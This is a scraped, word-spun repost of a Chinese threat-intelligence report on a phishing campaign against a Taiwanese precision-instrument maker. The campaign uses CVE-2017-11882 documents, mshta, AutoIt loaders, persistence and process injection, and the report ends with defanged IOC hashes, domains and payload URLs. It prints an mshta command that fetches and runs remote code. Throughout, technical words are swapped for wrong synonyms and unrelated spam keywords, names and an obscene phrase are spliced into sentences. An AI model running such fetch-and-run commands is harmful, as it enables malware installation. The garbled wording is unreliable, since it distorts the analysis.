首页 体育世界正文

情侣游戏名,商贸信病毒针对某精密仪器公司的APT进犯,耐卡影音

一、布景

近期腾讯安全御见要挟情报中监测到有黑客安排运用“商贸信”病毒猩猩生殖器针对外贸职业的APT侵犯再次活泼。此轮侵犯的特色为,运用2017年微软发布的office公式编辑器缝隙CVE-2017-11882结构垂钓文档,文档触发缝隙后经过mshta.exe履行由短链接bit.ly结构的长途代码,从而将后门木马植入。

在某例侵犯中,咱们发现侵犯者运用的垂钓文档称号中包括台湾某精细仪器公司的全称,而且将文档成功发送至该公司的邮箱中。该文档触发缝隙履行后会下载后门木马smbn.exe,木马开释AutoIt脚本履行器,然后将高度混杂的AutoIt脚本代码传入脚本履行器履行,并装置为发动项重复履行,木马具有检测虚拟机,制止使命办理器发动,封闭UA欧缇薇C,注入歹意代码到体系进程履行等功用。

“商贸信”侵犯流程图

二、详细剖析 垂钓邮件

高档钻石硬币有什么用

被侵犯台湾某公司为生成电脑数值操控(CNC),PCB成型机,PCB钻孔机等仪器,该公司与欧洲闻名厂商协作生辛子瑶产,是一家全球化企业。

针对该公司侵犯时的邮件附件名为:**精细股份限公司_3Q_pdf.doc,可见黑客已经在侵犯前搜集了该公司的详细信息。翻开文档发现包括一张图片,标题为“commercial invoice”,其意义为商业发票(SCcommercial情侣游戏名,商贸信病毒针对某精细仪器公司的APT侵犯,耐卡影音 invoice),是卖方开立的载有货品称号、数量、价格等内刘爱舟微博容的清单,作为买卖双方交代货品和结算货款的首要单证,是进口国确认征收进口关税的高鑫鑫根据,也是买卖双方索赔、理赔的根据。

文档中包括精心结构的CVE-2017-11882缝隙触发代码,翻开文档在未打补丁的电脑上会触发缝隙侵犯履行指令mshta http[:]//bit.l卡牌读心术y/2Y3jDhx &AAAAAAAAAAAAAAA

http[:]//bit.ly/2Y3jDhx为短链接,拜访时会跳转到地址http[:]//vilamax幽凰剑圣怎样打.home.pl/x/bn.hta,bn.hta持续下载和履行后门木马smbn.exe(http[:]//nextserv.pl/av/smbn.exe)

smb情侣游戏名,商贸信病毒针对某精细仪器公司的APT侵犯,耐卡影音n.exe

smbn.exe为自解压程序,运转后开释55个文件到%Temp%/08761141/目录下。其中最要害的文件有三西内琉奈个:lfw.exe为AutoIt脚本履行器,xql=njc为第一层脚本,phm.ppt为被加密的终究脚本。(AutoIt是一个运用相似BASIC脚本语言的免费软件,它规划用于Windows GUI(图形用户界面)中进行自动化操作,它运用模仿键盘按键,鼠标移动和窗口/控件的组合来完成自动化使命。)

解压24开时会经过指令行发动mvs.vbs,该脚本将 “xql=njc”文件作为参数传递给lfw.exe履行。

“xql=njc”文件被加入了很多杂质数据,因此有超越10M 巨细,剖析时发现里边包括真实履行的AutoIt脚本只要78行代码。

杂质中隐藏的AutoIt代码:

提取出AutoIt代码只要78行:

剖析“xql=njc”中的脚本代码,发现其功用为从phm.ppt中依照必定的特征如“S3tting”、“Dir3ctory”、“sK”、“sN”、“sData”、“esData”等定位加密数据,将加密数据解密成新的AutoIt代码后,保存至当时目录下的五位随机字符组成的文件名中,然后经过Run指令履行该脚本文件。

定位加密数据

生成五位随机名字符文件,取ASCII编码65至90红尘诛仙(对应大写字母A至Z)

将解密后的代码写入文件(随机文件名)并经过Run指令发动履行

中心脚本

解密出的随机名脚本文件共有754行代码,相同作为参数由脚本履行器lfw.exe履行,脚本完成虚拟机检测,装置发动项,解密PE数据,注入进程履行等中心功用,而且会在履行完毕后被当即删去。

胜狮场站提单号查询

脚本文件方位

C:\励鹰核全国DocumentsandSettings\[guid]\LocalSettings\Temp\08761141\SVDDG

C:\Users\[guid]\AppData\Local\Temp\08761141\KUEHL

C:\DocumentsandSettings\[guid]\LocalSettings\Temp\08761141\SVDDG

C:\Users\龙陨九霄[guid]\AppData\Local\Temp\08761141\KUEHL

再次从phm.ppt中读取加密数据

写入注册表增加发动项

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVer情侣游戏名,商贸信病毒针对某精细仪器公司的APT侵犯,耐卡影音sion\Run

HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce

封闭UAC

检测虚拟机

将start.vbs增加到发动项,start.vbs履行start.cmd,start.cmd最终发动lfw.exe “xql=njc”

禁使命办理器进程发动

经过ShellExecute履行mshta.exe

履行run.vbs,该脚本相同用于发动lfw.exe “xql=njc”

将数据还原为PE结构

将歹意代码注入体系进程

衔接C2地址smb3ans.pw

三、安全主张

1、不要翻开不明来历的邮件附件,关于邮件附件中的文件要慎重运转,如发现有脚本或其他可履行文件可先运用杀毒软件进行扫描;

2、晋级office系列软件到最新版别,不要随意运转不行信文档中的宏;

3、引荐布置腾讯御点终端安全办理体系防护病毒木马侵犯;

4、运用腾讯御界高档要挟检测体系检测不知道黑客的各种可疑侵犯行为。御界高档要挟检测体系,是根据腾讯反病毒实验室的安全才能、依托腾讯在云和端的海量数据,研宣布的共同要挟情报和歹意检测模型体系。

1、不要翻开不明来历的邮件附件,关于邮件附件中的文件要慎重运转,如发现有脚本或其他可履行文件可先运用杀毒软件进行扫描;

2、晋级office系列软件到最新版别,不要随意运转不行信文档中的宏;

3、引荐布置腾讯御点终端安全办理体系防护病毒木马侵犯;

4、运用腾讯御界高档要挟检测体系检测不知道黑客的各种可疑侵犯行为。御界高档要挟检测体系,是根据腾讯反病毒实验室的安全才能、依托腾讯在云和端的海量数据,研宣布的共同要挟情报和歹意检测模型体系。

IOCs

a946caff9b3ae9aa8e8acf555564e296

f5210ee307e0b2c116bfa12b3d4a701c

678e4f45baf3f712988124a4142a50eb

96fc胡大宝vs赤手温顺0ef4af7b2704194b9c04a04354a7

d22a2cd43e5b45bfc940e3fae989情侣游戏名,商贸信病毒针对某精细仪器公司的APT侵犯,耐卡影音9548

b706d74aaede26情侣游戏名,商贸信病毒针对某精细仪器公司的APT侵犯,耐卡影音a5b106b9ed836a33f9

7579a2ccca5100f4d669bd70916cabff

8d3cfd4833fe6e76b2ab81debad00ecb

6ee7ddebff0a2b78c7ac30f6e00d1d11

3a470a4ffb26904b大鸨鸟ae147c85c7686afb

邮箱

jerryaccountant@yahoo.com

Domain

vilamax.home.pl

nextserv.pl

zaloparvari.ir

smb3ans.pw

URL

http[:]//bit.ly/2Y3jDhx

http[:]//bit.ly/2Sh9xDv

http[:]//bit.ly/2Gr1Tlf

http[:]//bit.ly/2Y2vDQy

http[:]//bit.ly/2SrN6f8

http[:]//bit.ly/2Gr1Tlf

http[:]//bit.ly/2YSVgQ1

http[:]//bit.ly/2Sg8m7n

http[:]//bit.ly/2Srp9Va

http[:]//vilamax.home.pl/x/bn.hta

http[:]//vilamax.home.pl/css/joibr.exe

http[:]//vilamax.home.pl/x/ny.hta

http[:]//vilamax.home.pl/a/klzb.pif

http[:]//vilamax.home.pl/css/k1tt.exe

http[:]//vilamax.home.pl/css/joyk.exe

http[:]//nexts楚楚街商家进口erv.pl/av/smbn.exe

http[:]//ne情侣游戏名,商贸信病毒针对某精细仪器公司的APT侵犯,耐卡影音xtserv.pl/av/ktzb.exe

http[:]//nextserv.pl/av/jony.exe

http[:]//zaloparvari.ir/fries.hta

http[:]//zaloparvari.ir/freind.hta

http[:]//zalJoyrunoparvari.ir/payment.doc

http[:]//zaloparvari.ir/RFQorder.doc

http[:]//netlux.in/情侣游戏名,商贸信病毒针对某精细仪器公司的APT侵犯,耐卡影音img/bn.hta

http[:]//netlux.in/img/zb.hta

http[:]//netlux.in/img/my.hta

*本文作者:腾讯安全联合实验室,转载请注明来自FreeBuf.COM

国学常识1000题
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。